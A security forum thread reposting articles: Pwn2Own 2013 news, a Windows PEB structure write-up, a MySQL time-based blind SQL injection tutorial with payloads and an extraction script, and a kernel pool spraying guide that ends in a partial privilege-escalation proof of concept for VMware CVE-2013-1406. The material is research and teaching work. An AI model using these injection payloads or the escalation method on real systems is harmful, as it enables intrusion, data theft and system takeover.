Experts from MWR Labs have managed to demonstrate a full sandbox bypass exploit against the latest stable version of Chrome. “By visiting a malicious webpage, it was possible to exploit a vulnerability which allowed us to gain code execution in the context of the sandboxed renderer process,” MWR Labs representatives wrote. “We also used a kernel vulnerability in the underlying operating system in order to gain elevated privileges and to execute arbitrary commands outside of the sandbox with system privileges.”

Java was also “pwned” by Josh Drake of Accuvant Labs and James Forshaw of Contextis. Currently, VUPEN is working on breaking Flash, Pham Toan is attempting to hack Internet Explorer 10, and the famous George Hotz is taking a crack at Adobe Reader.

Sursa: Major Browsers, Java Hacked on the First Day of Pwn2Own 2013 - Softpedia
  22. [h=2]Evolution of Process Environment Block (PEB)[/h] March 2, 2013 / ReWolf

Over one year ago I published a unified definition of the PEB for x86 and x64 Windows (PEB32 and PEB64 in one definition). It was based on the PEB taken from Windows 7 NTDLL symbols, but I was pretty confident that it should work on other versions of Windows as well. Recently someone left a comment under the mentioned post: “Good, but is it only for Windows 7?”. It made me curious whether it really is only for Win7. I was expecting that there might be some small differences between some field names, or maybe some new fields added at the end, but the overall structure should be the same. I had no other choice but to check it myself.

I collected 108 different ntdll.pdb/wntdll.pdb files from various versions of Windows and dumped the _PEB structure from them (Dia2Dump ftw!). Here are some statistics:

- _PEB was defined in 80 different PDBs (53 x86 PEBs and 27 x64 PEBs)
- There were 11 unique PEBs for x86 and 8 unique PEBs for x64 (those numbers don't sum up, as starting from Windows 2003 SP1 there is always a match between the x86 and x64 versions)
- The total number of collected different _PEB definitions is equal to 11

I’ve put all the collected information into a nice table (click the picture to open the PDF): [Image: PEB Evolution PDF]

The left column of the table represents the x86 offset and the right column the x64 offset. Green fields are supposed to be compatible across all Windows versions, starting from XP without any SP and ending at Windows 8 RTM; red (pink? rose?) fields should be used only after carefully verifying that they work on the target system. At the top of the table there is a row called NTDLL TimeStamp. It is not the timestamp from the PE header but the one from the Debug Directory (IMAGE_DIRECTORY_ENTRY_DEBUG; LordPE can parse this structure). I’m using this timestamp as a unique identifier for the NTDLL version; this timestamp is also stored in the PDB files.
Now I can answer the initial question: “Is my previous PEB32/PEB64 definition wrong?” Yes and no. Yes, because it contains various fields specific to Windows 7, thus it can be considered wrong. No, because most fields are exactly the same across all Windows versions, especially those fields that are usually used in third-party software. To satisfy everyone, I’ve prepared another version of the PEB32/PEB64 definition:

#pragma pack(push)
#pragma pack(1)

template <class T>
struct LIST_ENTRY_T {
    T Flink;
    T Blink;
};

template <class T>
struct UNICODE_STRING_T {
    union {
        struct {
            WORD Length;
            WORD MaximumLength;
        };
        T dummy;
    };
    T _Buffer;
};

template <class T, class NGF, int A>
struct _PEB_T {
    union {
        struct {
            BYTE InheritedAddressSpace;
            BYTE ReadImageFileExecOptions;
            BYTE BeingDebugged;
            BYTE _SYSTEM_DEPENDENT_01;
        };
        T dummy01;
    };
    T Mutant;
    T ImageBaseAddress;
    T Ldr;
    T ProcessParameters;
    T SubSystemData;
    T ProcessHeap;
    T FastPebLock;
    T _SYSTEM_DEPENDENT_02;
    T _SYSTEM_DEPENDENT_03;
    T _SYSTEM_DEPENDENT_04;
    union {
        T KernelCallbackTable;
        T UserSharedInfoPtr;
    };
    DWORD SystemReserved;
    DWORD _SYSTEM_DEPENDENT_05;
    T _SYSTEM_DEPENDENT_06;
    T TlsExpansionCounter;
    T TlsBitmap;
    DWORD TlsBitmapBits[2];
    T ReadOnlySharedMemoryBase;
    T _SYSTEM_DEPENDENT_07;
    T ReadOnlyStaticServerData;
    T AnsiCodePageData;
    T OemCodePageData;
    T UnicodeCaseTableData;
    DWORD NumberOfProcessors;
    union {
        DWORD NtGlobalFlag;
        NGF dummy02;
    };
    LARGE_INTEGER CriticalSectionTimeout;
    T HeapSegmentReserve;
    T HeapSegmentCommit;
    T HeapDeCommitTotalFreeThreshold;
    T HeapDeCommitFreeBlockThreshold;
    DWORD NumberOfHeaps;
    DWORD MaximumNumberOfHeaps;
    T ProcessHeaps;
    T GdiSharedHandleTable;
    T ProcessStarterHelper;
    T GdiDCAttributeList;
    T LoaderLock;
    DWORD OSMajorVersion;
    DWORD OSMinorVersion;
    WORD OSBuildNumber;
    WORD OSCSDVersion;
    DWORD OSPlatformId;
    DWORD ImageSubsystem;
    DWORD ImageSubsystemMajorVersion;
    T ImageSubsystemMinorVersion;
    union {
        T ImageProcessAffinityMask;
        T ActiveProcessAffinityMask;
    };
    T GdiHandleBuffer[A];
    T PostProcessInitRoutine;
    T TlsExpansionBitmap;
    DWORD TlsExpansionBitmapBits[32];
    T SessionId;
    ULARGE_INTEGER AppCompatFlags;
    ULARGE_INTEGER AppCompatFlagsUser;
    T pShimData;
    T AppCompatInfo;
    UNICODE_STRING_T<T> CSDVersion;
    T ActivationContextData;
    T ProcessAssemblyStorageMap;
    T SystemDefaultActivationContextData;
    T SystemAssemblyStorageMap;
    T MinimumStackCommit;
};

typedef _PEB_T<DWORD, DWORD64, 34> PEB32;
typedef _PEB_T<DWORD64, DWORD, 30> PEB64;

#pragma pack(pop)

The above version is system independent, as all fields that change across OS versions are marked as _SYSTEM_DEPENDENT_xx. I’ve also removed all fields from the end that were added after Windows XP.

Sursa: Evolution of Process Environment Block (PEB)
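As a quick sanity check of the table above, the "green" front of the structure can be mirrored with ctypes and its offsets compared against the well-known values (BeingDebugged at 0x02, ImageBaseAddress at 0x08/0x10 for x86/x64). This is only a sketch of the first few fields, not the full template:

```python
import ctypes

class PEB32_FRONT(ctypes.Structure):
    """First fields of PEB32 from the definition above (pack(1), T = DWORD)."""
    _pack_ = 1
    _fields_ = [
        ("InheritedAddressSpace",    ctypes.c_ubyte),
        ("ReadImageFileExecOptions", ctypes.c_ubyte),
        ("BeingDebugged",            ctypes.c_ubyte),
        ("_SYSTEM_DEPENDENT_01",     ctypes.c_ubyte),
        ("Mutant",                   ctypes.c_uint32),
        ("ImageBaseAddress",         ctypes.c_uint32),
        ("Ldr",                      ctypes.c_uint32),
        ("ProcessParameters",        ctypes.c_uint32),
    ]

class PEB64_FRONT(ctypes.Structure):
    """Same fields with T = DWORD64; dummy01 pads the four BYTEs to sizeof(T)."""
    _pack_ = 1
    _fields_ = [
        ("InheritedAddressSpace",    ctypes.c_ubyte),
        ("ReadImageFileExecOptions", ctypes.c_ubyte),
        ("BeingDebugged",            ctypes.c_ubyte),
        ("_SYSTEM_DEPENDENT_01",     ctypes.c_ubyte),
        ("_dummy01_pad",             ctypes.c_uint32),
        ("Mutant",                   ctypes.c_uint64),
        ("ImageBaseAddress",         ctypes.c_uint64),
        ("Ldr",                      ctypes.c_uint64),
        ("ProcessParameters",        ctypes.c_uint64),
    ]

assert PEB32_FRONT.BeingDebugged.offset == 0x02
assert PEB32_FRONT.ImageBaseAddress.offset == 0x08
assert PEB32_FRONT.Ldr.offset == 0x0C
assert PEB64_FRONT.BeingDebugged.offset == 0x02
assert PEB64_FRONT.ImageBaseAddress.offset == 0x10
assert PEB64_FRONT.Ldr.offset == 0x18
```

The same trick (unions emulating the natural padding that pack(1) removes) is what the NtGlobalFlag/dummy02 union does further down the structure.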
  23. [h=3]MySQL Injection Time Based[/h]

We have already written a couple of posts on SQL injection techniques, such as "SQL Injection Union Based", "Blind SQL Injection" and, last but not least, "Common problems faced while performing SQL Injection". However, the series could not miss the time-based SQL injection technique. @yappare has come up with another excellent post, which explains how this attack can be used to perform a wide variety of attacks. Over to @yappare.

Hey everyone! It's another post by me, @yappare. As I promised our Mr Rafay previously that I would write a tutorial for RHA on the MySQL time-based technique, here's a simple tutorial on MySQL time-based SQLi. Before that, as usual, here are some good references for those interested in SQLi: Time-Based Blind SQL Injection with Heavy Queries and, of course, the greatest cheatsheet, Cheat Sheets | pentestmonkey.

OK, back to our testing machine. In this example I'll use the OWASP WebApps vulnerable machine, tested on the Peruggia application. Let's go!

Previously, we already knew that the pic_id parameter is vulnerable to SQLi. So, let's say we want to use a time-based attack on this vulnerable parameter; here is what we are going to do. But first, note that in MySQL, for time-based SQLi, we are going to use the SLEEP() function. Each DBMS has a different kind of function to use, but the steps are usually quite similar:

In MSSQL we use WAITFOR DELAY
In POSTGRES we use PG_SLEEP()
and so on; do check the pentestmonkey cheatsheet.

Back to our testing. Let's check whether a time-based attack can be performed against the parameter or not. Test it using this command:

pic_id=13 and sleep(5)--

As we can see from the image above, there's a difference between the requests. The first one is a normal request, where the response time is 0 seconds, while in the second request I included the SLEEP() command, so the server waited 5 seconds before responding. So from here we know that it can be attacked via the time-based technique as well. Let's proceed to check the current user.
Here's the command that we are going to use:

pic_id=13 and if(substring(user(),1,1)='a',SLEEP(5),1)--

With this query, if the first character of the current user is 'a', the server will sleep for 5 seconds before responding. If not, the server responds in its normal response time. You then proceed to test other characters. From the image above we can clearly see that for the first and second requests the server responded in 0 seconds, while the third request was delayed by 5 seconds. Why? Because the first character of the current user is 'p', not 'a' or 'h'. Then you can proceed to check the second character and so on:

pic_id=13 and if(substring(user(),2,1)='a',SLEEP(5),1)--
pic_id=13 and if(substring(user(),3,1)='a',SLEEP(5),1)--

So go on with table name guessing:

pic_id=13 and IF(SUBSTRING((select 1 from [guess_your_table_name] limit 0,1),1,1)=1,SLEEP(5),1)

The first request is FALSE, because the server response is 0 seconds, so no table named "user" exists. The second request was delayed by 5 seconds, so a table named "users" does exist!

How about guessing the column name? It's easy:

pic_id=13 and IF(SUBSTRING((select substring(concat(1,[guess_your_column_name]),1,1) from [existing_table_name] limit 0,1),1,1)=1,SLEEP(5),1)

See the image above? Still need any explanation? I bet you already understand it! Now, data extraction mode:

pic_id=13 and if((select mid(column_name,1,1) from table_name limit 0,1)='a',sleep(5),1)--

So, if the first character of the data in the right column of the right table is 'a', the server will be delayed for 5 seconds. Then proceed to test the second, third character and so on. The image shows that the username is "admin". Is it correct? Let's double-check it. Yeah, it's correct. That's all for now!

Thanks, @yappare

Sursa: MySQL Injection Time Based | Learn How To Hack - Ethical Hacking and security tips
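The character-by-character loop above is easy to automate. The sketch below (names and the simulated delay are mine) factors the timing check into an "oracle" callable so the logic can be demonstrated offline; in a real test the oracle would send the pic_id=13 and if(substring(user(),N,1)='c',SLEEP(5),1)-- payload over HTTP and measure the response time:

```python
import string
import time

DELAY = 0.01  # stand-in for SLEEP(5); kept tiny so the demo runs fast

def make_fake_oracle(secret: str):
    """Simulates the DB: the response is slow only when the guess is right."""
    def oracle(pos: int, ch: str) -> float:
        start = time.monotonic()
        if pos <= len(secret) and secret[pos - 1] == ch:
            time.sleep(DELAY)          # the SLEEP(5) branch of the IF()
        return time.monotonic() - start
    return oracle

def extract(oracle, max_len=32,
            charset=string.ascii_lowercase + string.digits + "@_"):
    """Recover a string one character at a time, substring()-style (1-indexed)."""
    out = ""
    for pos in range(1, max_len + 1):
        for ch in charset:
            if oracle(pos, ch) >= DELAY:   # slow answer == TRUE branch
                out += ch
                break
        else:
            break                          # no character matched: end of string
    return out

assert extract(make_fake_oracle("admin")) == "admin"
```

One request per candidate character makes this attack slow but very quiet, which is exactly why it works even when the page output never changes.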
  24. [h=3]Stars aligner’s how-to: kernel pool spraying and VMware CVE-2013-1406[/h]

Author: Artem Shishkin, Positive Research.

If you deal with Windows kernel vulnerabilities, it is likely that you’ll have to deal with the kernel pool in order to develop an exploit. It is useful to learn how to keep the behavior of this kernel entity under your control. In this article I will try to give a high-level overview of kernel pool internals. This object has already been deeply researched several times, so if you need more technical information, please google it or use the references at the end of this article.

Kernel pool structure overview

The kernel pool is the common place for obtaining memory in the operating system kernel. Remember that stacks are very small in the kernel environment; they are suitable only for a small bunch of local non-array variables. Once a driver needs to create a large data structure or a string, it will certainly use pool memory. There are different types of pools, but all of them have the same structure (except for the driver verifier’s special pool). Every pool has a special control structure called a pool descriptor. Among other purposes, it maintains lists of free pool chunks, which represent free pool space. The pool itself consists of memory pages. They can be standard 4 KB or large 1 MB in size. The number of pages used for the pool is adjusted dynamically. Kernel pool pages are then split into chunks. These are the exact chunks that drivers are given when requesting memory from the pool.

Pool chunk on x86 systems

Pool chunks have the following meta-information inside:

1. Previous size: the size of the preceding chunk.
2. Pool index: used in situations with more than one pool of a certain type. For example, there are multiple paged pools in the system. This field identifies which paged pool the chunk belongs to.
3. Block size: the size of the current chunk.
Just like the previous size field, the size is encoded as (pool chunk data size + size of pool header + optional 4 bytes for a pointer to the process charged for the allocation) >> 3 (or >> 4 on x64 systems).
4. Pool type: a flag bitmask for the current chunk. Notice that these flags are not officially documented.
   T (Tracked): this chunk is tracked by the driver verifier. Pool tracking is used for debugging purposes.
   S (Session): the chunk belongs to the paged session pool, a special pool used for session-specific allocations.
   Q (Quota): the chunk takes part in the quota management mechanism. This flag is only relevant on 32-bit systems. If this flag is present, a pointer to the process charged for the allocation is stored at the end of the chunk.
   U (In use): this chunk is currently in use. Otherwise the chunk is free, which means that we can allocate memory from it. This flag is the third bit on pre-Vista systems and the second bit on Vista and later.
   B (Base pool): identifies the pool which the chunk belongs to. There are two base pools: paged and non-paged. Non-paged is encoded as 0 and paged as 1. On pre-Vista systems this flag could occupy two bits, because the base pool type was encoded as (base pool type + 1), that is 0b10 for the paged pool and 0b1 for the non-paged pool.
5. Pool tag: used for debugging purposes. Drivers specify a four-byte character signature which identifies the subsystem or driver that uses this chunk. For example, the “NtFs” tag means that the chunk belongs to the ntfs.sys driver.

Pool chunk on x64 systems

There are a couple of differences on 64-bit systems. The first is the different field sizes, and the second is a new 8-byte field with a pointer to the process charged for the allocation.

Kernel pool memory allocation overview

Imagine that the pool is empty; there is no pool space at all.
If we try to allocate memory from the pool (let’s say its size is less than 0xFF0), the allocator will first allocate a memory page and then place a chunk of the requested size on it. Since it is the first allocation on this page, the chunk will be placed at the start of the page.

[Image: The first pool chunk allocation sequence]

This page now has two pool chunks: the one that we allocated and a free one. The free chunk can be used for subsequent allocations. But from this moment the pool allocator tends to place new chunks at the end of the page or of the free space within the page.

[Image: Pool chunk allocation strategy]

When it comes to deallocation of the chunks, the process is repeated in reverse order: the chunks become free, and they are merged if they are adjacent.

[Image: Pool deallocation strategy]

The whole situation with empty pools is just a fantasy, because the pools are already charged with memory pages by the time we can actually use them.

Controlling the behavior of chunk allocations

Let’s keep in mind that the kernel pool is a heavily used object. First of all, it is used for creating all sorts of kernel objects and private kernel and driver structures. Secondly, the kernel pool takes part in a number of system calls, providing a buffer for the corresponding parameters. Since the computer is constantly servicing hardware by means of drivers and software by means of system calls, you can imagine the rate of kernel pool usage even when the system stays idle. Sooner or later the kernel pool becomes fragmented, because allocations and frees of different sizes follow each other in different orders. This is the origin of the “spraying” term: when sequentially allocating pool chunks, those chunks do not necessarily follow each other; they are most likely located in completely different places in memory. So, when filling the pool memory with controlled red-painted chunks, we are likely going to see the left side of the picture first, then the right one.
[Image: Heap spraying leads to the left picture, not the right one]

But there is an important exploitation-relevant circumstance: when there is no black region left for painting, we’ll get a new black region without stranger’s spots. From this point our spray becomes an ordinary brush with a solid color fill. From here we have a considerable level of control over the behavior of chunk allocation and the picture of the pool. I say considerable because we are still not guaranteed to be the painting master: our painting process can be interrupted by someone else spilling a different color.

[Image: The spraying becomes filling when using a lot of objects]

Depending on the type of object that we are using for spraying, we are able to create free windows of a needed size by freeing a number of objects that we created before. And the most important fact that allows us to make a controlled allocation is that the pool allocator tends to be as fast as possible. In order to use the processor cache effectively, the last freed pool chunk will be the first one allocated! This is the point of the controlled allocation, because we can guess the address of the chunk to be allocated. Of course, the size of the allocation matters. That’s why we have to calculate the size of the free chunk window. If we have to allocate a 0x315-byte chunk and we are spraying 0x20-byte chunks, we have to free 0x315 / 0x20 = (0x18 + 1) chunks, rounding up. I hope this is clear enough.

Here are some points to consider in order to be successful at kernel pool spraying:

1. If you don’t have the opportunity of allocating kernel pool memory through some target driver, you can always use Windows objects as spraying objects. Since Windows objects are naturally objects of the operating system kernel, they are stored in kernel pools. For the non-paged pool you can use processes, threads, events, semaphores, mutexes, etc.
For the paged pool you can use directory objects, key objects, section objects (also known as file mappings), etc. For the session pool you can use any GDI or USER object: palettes, DCs, brushes, etc. In order to free the memory occupied by those objects, you can simply close all open handles to them.
2. By the time we start spraying, there are pages available for pool usage, but they are too fragmented. If we need a space filled sequentially with controlled chunks, we need to spam the pool so that there is no place left on the currently available pages. After this we’ll get a new clean page, giving us a chance of sequential allocation of controlled chunks. In a nutshell: create lots of spraying objects.
3. When calculating the necessary window size, keep in mind that the chunk header size matters, and that the whole size is rounded up to 8 or 16 bytes on x86 and x64 machines respectively.
4. Although we are able to control the manner of allocation of the pool chunks, it is difficult to predict the relative positions of the sprayed objects. If you use Windows objects for spraying, thus having only the handle of an object but not its address, you can leak kernel object addresses using the NtQuerySystemInformation() function with the SystemExtendedHandleInformation class. It will provide all the information needed for precise spraying.
5. Keep the quantity of sprayed objects balanced. You’ll probably fail to control the chunk allocation when there is no memory left in the system at all.
6. One trick that might help you improve the reliability of kernel-pool-based exploits is assigning a high priority to the spraying and triggering thread. Since there is a race for pool memory, a raised thread priority gives you more chances to execute than the other threads in the system, which helps keep your spraying consistent.
Also consider the gap between spraying and triggering the vulnerability: the smaller it is, the better your chance of landing on the controlled pool chunk.

VMware CVE-2013-1406

A couple of weeks ago an interesting advisory by VMware was published. It promised local privilege escalation on both host and guest systems, thus leading to a double ownage. The vulnerable component was vmci.sys. VMCI stands for Virtual Machine Communication Interface; it is used for fast and efficient communication between guest virtual machines and their host server. VMCI presents a custom socket type, implemented as a Windows Socket Service Provider in the vsocklib.dll library. The vmci.sys module creates a virtual device that implements the needed functionality. This driver is always running on the host system. As for guest systems, VMware Tools have to be installed in order to use VMCI.

When writing an overview it would be nice to explain the high-level logic of the vulnerability in order to present a detective-like story. Unfortunately this is not the case, because there is not much public information about the VMCI implementation. I don’t think that people who exploit vulnerabilities always go deep into details, reverse engineering the whole target system. At least it would be more profitable to obtain a stable working exploit within a week than a high-level knowledge of how things work in months.

PatchDiff highlighted three patched functions. All of them were relevant to the same IOCTL code, 0x8103208C; something went terribly wrong with handling it.

[Image: Control flow of the code processing the 0x8103208C IOCTL]

The third patched function was eventually called both from the first and the second ones. The third function is supposed to allocate a pool chunk of a requested size times 0x68 and initialize it with zeroes. It contained an internal structure for dispatching the request. The problem was that the chunk size was specified in a user buffer for this IOCTL code and was not checked properly.
As a result, an internal structure was not allocated, which led to interesting consequences. A buffer is supplied for this IOCTL; its size is supposed to be 0x624 in order to reach the patched functions. To process the user request, an internal structure is allocated; its size is 0x20C. Its first 4 bytes are filled with a value specified at [user_buffer + 0x10]. These exact bytes are used to allocate another internal structure, a pointer to which is then stored in the last four bytes of the first one. But no matter whether the second chunk was allocated or not, a sort of dispatch function was invoked.

.text:0001B2B4 ; int __stdcall DispatchChunk(PVOID pChunk)
.text:0001B2B4 DispatchChunk   proc near       ; CODE XREF: PatchedOne+78
.text:0001B2B4                                 ; UnsafeCallToPatchedThree+121
.text:0001B2B4
.text:0001B2B4 pChunk = dword ptr 8
.text:0001B2B4
.text:0001B2B4 000 mov     edi, edi
.text:0001B2B6 000 push    ebp
.text:0001B2B7 004 mov     ebp, esp
.text:0001B2B9 004 push    ebx
.text:0001B2BA 008 push    esi
.text:0001B2BB 00C mov     esi, [ebp+pChunk]
.text:0001B2BE 00C mov     eax, [esi+208h]
.text:0001B2C4 00C xor     ebx, ebx
.text:0001B2C6 00C cmp     eax, ebx
.text:0001B2C8 00C jz      short CheckNullUserSize
.text:0001B2CA 00C push    eax             ; P
.text:0001B2CB 010 call    ProcessParam    ; We won't get here
.text:0001B2D0
.text:0001B2D0 CheckNullUserSize:              ; CODE XREF: DispatchChunk+14
.text:0001B2D0 00C cmp     [esi], ebx
.text:0001B2D2 00C jbe     short CleanupAndRet
.text:0001B2D4 00C push    edi
.text:0001B2D5 010 lea     edi, [esi+8]
.text:0001B2D8
.text:0001B2D8 ProcessUserBuff:                ; CODE XREF: DispatchChunk+51
.text:0001B2D8 010 mov     eax, [edi]
.text:0001B2DA 010 test    eax, eax
.text:0001B2DC 010 jz      short NextCycle
.text:0001B2DE 010 or      ecx, 0FFFFFFFFh
.text:0001B2E1 010 lea     edx, [eax+38h]
.text:0001B2E4 010 lock xadd [edx], ecx
.text:0001B2E8 010 cmp     ecx, 1
.text:0001B2EB 010 jnz     short DerefObj
.text:0001B2ED 010 push    eax
.text:0001B2EE 014 call    UnsafeFire      ; BANG!!!!
.text:0001B2F3
.text:0001B2F3 DerefObj:                       ; CODE XREF: DispatchChunk+37
.text:0001B2F3 010 mov     ecx, [edi+100h] ; Object
.text:0001B2F9 010 call    ds:ObfDereferenceObject
.text:0001B2FF
.text:0001B2FF NextCycle:                      ; CODE XREF: DispatchChunk+28
.text:0001B2FF 010 inc     ebx
.text:0001B300 010 add     edi, 4
.text:0001B303 010 cmp     ebx, [esi]
.text:0001B305 010 jb      short ProcessUserBuff
.text:0001B307 010 pop     edi
.text:0001B308
.text:0001B308 CleanupAndRet:                  ; CODE XREF: DispatchChunk+1E
.text:0001B308 00C push    20Ch            ; size_t
.text:0001B30D 010 push    esi             ; void *
.text:0001B30E 014 call    ZeroChunk
.text:0001B313 00C push    'gksv'          ; Tag
.text:0001B318 010 push    esi             ; P
.text:0001B319 014 call    ds:ExFreePoolWithTag
.text:0001B31F 00C pop     esi
.text:0001B320 008 pop     ebx
.text:0001B321 004 pop     ebp
.text:0001B322 000 retn    4
.text:0001B322 DispatchChunk   endp

The dispatch function was searching for a pointer to process. The processing included dereferencing some object and calling some function if appropriate flags had been set inside the pointed-to structure. But since we failed to allocate a structure to process, the dispatch function slid beyond the end of the first chunk. When uncontrolled, this processing leads to an access violation and a subsequent BSOD.

IOCTL dispatch structure and the dispatcher behavior

So we've got possible code execution at a controlled address:

.text:0001B946 UnsafeFire      proc near
.text:0001B946
.text:0001B946 arg_0 = dword ptr 8
.text:0001B946
.text:0001B946 000 mov     edi, edi
.text:0001B948 000 push    ebp
.text:0001B949 004 mov     ebp, esp
.text:0001B94B 004 mov     eax, [ebp+arg_0]
.text:0001B94E 004 push    eax
.text:0001B94F 008 call    dword ptr [eax+0ACh] ; BANG!!!!
.text:0001B955 004 pop     ebp
.text:0001B956 000 retn    4
.text:0001B956 UnsafeFire      endp

Exploitation

Since the chunk dispatch code slips beyond the chunk it is supposed to process, it meets either a neighboring chunk or an unmapped page. If it lands in unmapped memory, a BSOD occurs.
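The out-of-bounds walk in the listings above can be modeled in a few lines of Python (a simulation I wrote for illustration; the offsets follow the listings, everything else is hypothetical). With the attacker-controlled count at offset 0 far larger than the number of entries that fit in the 0x20C chunk, the loop over the DWORD slots starting at offset 8 slides straight into whatever follows the chunk and treats it as pointers:

```python
import struct

def dispatch_chunk(chunk, after):
    """Model of the DispatchChunk loop: the entry count comes from the first
    DWORD of the chunk ([esi]), entries are DWORD slots starting at offset 8
    ([esi+8]). A nonzero slot is treated as an object pointer (its refcount
    at +0x38 gets decremented, and UnsafeFire may call [ptr+0ACh])."""
    memory = chunk + after            # 'after' = whatever neighbors the chunk
    count = struct.unpack_from("<I", memory, 0)[0]
    hits = []
    for i in range(count):
        off = 8 + 4 * i
        if off + 4 > len(memory):     # in the kernel: unmapped page -> BSOD
            break
        ptr = struct.unpack_from("<I", memory, off)[0]
        if ptr:
            hits.append((off, ptr))
    return hits

# 0x20C-byte chunk, zeroed except the unchecked count copied from the user buffer
chunk = struct.pack("<I", 0xFFFFFFF0) + b"\x00" * (0x20C - 4)
# x86 POOL_HEADER of a neighboring chunk: PreviousSize 0x43 | PoolIndex 0 in
# the low word; (BlockSize | pool-type flags << 9) in the high word
neighbor = struct.pack("<HH", 0x0043, 0x04A2) + b"\x00" * 0x20
print([hex(p) for _, p in dispatch_chunk(chunk, neighbor)])  # ['0x4a20043']
```

The only "pointer" the model finds sits exactly at offset 0x20C, i.e. the neighbor's pool header read as a DWORD, which is the effect the next section exploits.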
But when it meets another pool chunk, it tries to process the pool header, interpreting it as a pointer. Consider an x86 system. The four bytes the dispatcher function interprets as a pointer are the previous block size, the pool index, the current block size and the pool type flags. Since we know the size and the pool index used for the skipped chunk, we know the low word of the pointer: 0xXXXX0043. 0x43 is the size of the skipped chunk, which becomes the "previous size" field of the neighboring chunk, and 0x0 is the pool index, which is guaranteed to be 0, since the non-paged pool used for the skipped chunk is the only one in the system. Notice that if two adjacent chunks share the same pool page, they belong to the same pool type and index.

The high word contains the block size, which we can't predict, and the pool type flags, which we can: B = 0 because the chunk is from the non-paged pool; U = 1 because the chunk is supposed to be in use; Q = 0/1 since the chunk might be quoted; S = 0 because the pool is not the session one; T = 0 since pool tracking is likely to be disabled by default. The unused bits of the pool type field are equal to 0. So we've got the following memory windows, valid for Windows 7 and Windows 8:

0x04000000 – 0x06000000 for ordinary chunks
0x14000000 – 0x16000000 for quoted chunks

Based on the provided information you can easily calculate the memory windows for Windows XP and alike. As you can see, those memory ranges belong to user space, so we are able to force the vulnerable dispatch function to execute shellcode that we provide. In order to achieve arbitrary code execution, we have to map the calculated regions and meet the requirements of the dispatch function:

1. Within [0x43 + 0x38] place a DWORD value of 1 in order to satisfy the following code:

.text:0001B2E1 010 lea     edx, [eax+38h]
.text:0001B2E4 010 lock xadd [edx], ecx
.text:0001B2E8 010 cmp     ecx, 1

2. Within [0x43 + 0xAC] place a pointer to the function to be called, or simply the address of the shellcode.

3. Within [0x43 + 0x100] place a pointer to a fake object to be dereferenced with the ObfDereferenceObject() function. Notice that the reference count is taken from the object header, which is located at a negative offset from the object itself, so make sure this function is not going to land on an unmapped region. Also provide a suitable reference count so that ObfDereferenceObject() will not try to free the user-mode memory with functions that are not suited for that.

4. Repeat this algorithm every 0x10000 bytes.

Everything has been done right!

Improving the reliability of an exploit

Although we have developed a nice exploitation strategy, it is still unreliable. Consider the case when the chunk after the vulnerable one is freed. It is difficult to guess the state of that chunk's fields. Although such a chunk forms a pointer that is valid for the dispatch function (because it is not NULL), dispatching it will lead to a BSOD. The same is true when the dispatch function slides onto an unmapped virtual address. Kernel pool spraying is very useful in this case. As a spraying object I chose semaphores, since they provide the closest chunk size to the one I needed. This technique helped a lot in improving the stability of the exploit.

Remember that Windows 8 has SMEP support, so it is a little more complicated to exploit due to the laziness of a shellcode developer. Writing base-independent code and bypassing SMEP is left as an exercise for the reader.

As for x64 systems, the problem is that the pointer becomes 8 bytes in size. This means that the high DWORD of the pointer interpreted by the dispatch function falls on the pool chunk tag field. Since most drivers and kernel subsystems use ASCII symbols for tagging, the pointer falls into non-canonical address space, so it can't be used for exploitation.
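The pointer arithmetic and the four requirements above can be sketched in Python (again my own illustration; the pool-type flag values follow the Win7 comment in the PoC source below, and the shellcode/fake-object addresses are hypothetical placeholders):

```python
import struct

def header_as_pointer(prev_size, pool_index, block_size, pool_type):
    """x86 POOL_HEADER read as a DWORD: PreviousSize(9 bits) | PoolIndex(7) << 9
    in the low word, BlockSize(9) | PoolType(7) << 9 in the high word."""
    lo = (prev_size & 0x1FF) | ((pool_index & 0x7F) << 9)
    hi = (block_size & 0x1FF) | ((pool_type & 0x7F) << 9)
    return lo | (hi << 16)

IN_USE, QUOTA = 0x2, 0x8   # Win7/Win8 pool-type flags (per the PoC comments)

# Sweep the unpredictable BlockSize field to get the reachable windows
lo = header_as_pointer(0x43, 0, 0x000, IN_USE)
hi = header_as_pointer(0x43, 0, 0x1FF, IN_USE)
print(hex(lo), hex(hi))    # 0x4000043 0x5ff0043 -> the 0x04000000-0x06000000 window

def build_fake_region(size, step=0x10000, shellcode=0x41414141, fake_obj=0x04001000):
    """Steps 1-4: at every 'step' bytes treat base+0x43 as the pointer the
    dispatcher will form, and populate +0x38 (refcount = 1), +0xAC (call
    target) and +0x100 (object for ObfDereferenceObject)."""
    buf = bytearray(size)
    for base in range(0, size, step):
        p = base + 0x43
        struct.pack_into("<I", buf, p + 0x38, 1)
        struct.pack_into("<I", buf, p + 0xAC, shellcode)
        struct.pack_into("<I", buf, p + 0x100, fake_obj)
    return buf

region = build_fake_region(0x20000)
```

Mapping such a region at every candidate window (as the C PoC below does with VirtualAlloc) guarantees that whichever BlockSize the neighboring chunk happens to have, the forged pointer lands on a prepared fake object.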
By this time I was unable to find a solution for this problem.

In the end, I hope this article was useful for you, and I'm sorry that I could not fit all the needed information into a couple of paragraphs. I wish you good luck in researching and exploiting for the sake of making things more secure.

Source Code:

/*
    CVE-2013-1406 exploitation PoC
    by Artem Shishkin,
    Positive Research,
    Positive Technologies,
    02-2013
*/

void __stdcall FireShell(DWORD dwSomeParam)
{
    EscalatePrivileges(hProcessToElevate);

    // Equate the stack and quit the cycle
#ifndef _AMD64_
    __asm
    {
        pop ebx
        pop edi
        push 0xFFFFFFF8
        push 0xA010043
    }
#endif
}

HANDLE LookupObjectHandle(PSYSTEM_HANDLE_INFORMATION_EX pHandleTable,
                          PVOID pObjectAddr, DWORD dwProcessID = 0)
{
    HANDLE hResult = 0;
    DWORD dwLookupProcessID = dwProcessID;

    if (pHandleTable == NULL) {
        printf("Ain't funny\n");
        return 0;
    }

    if (dwLookupProcessID == 0) {
        dwLookupProcessID = GetCurrentProcessId();
    }

    for (unsigned int i = 0; i < pHandleTable->NumberOfHandles; i++) {
        if ((pHandleTable->Handles[i].UniqueProcessId == (HANDLE)dwLookupProcessID) &&
            (pHandleTable->Handles[i].Object == pObjectAddr)) {
            hResult = pHandleTable->Handles[i].HandleValue;
            break;
        }
    }

    return hResult;
}

PVOID LookupObjectAddress(PSYSTEM_HANDLE_INFORMATION_EX pHandleTable,
                          HANDLE hObject, DWORD dwProcessID = 0)
{
    PVOID pResult = 0;
    DWORD dwLookupProcessID = dwProcessID;

    if (pHandleTable == NULL) {
        printf("Ain't funny\n");
        return 0;
    }

    if (dwLookupProcessID == 0) {
        dwLookupProcessID = GetCurrentProcessId();
    }

    for (unsigned int i = 0; i < pHandleTable->NumberOfHandles; i++) {
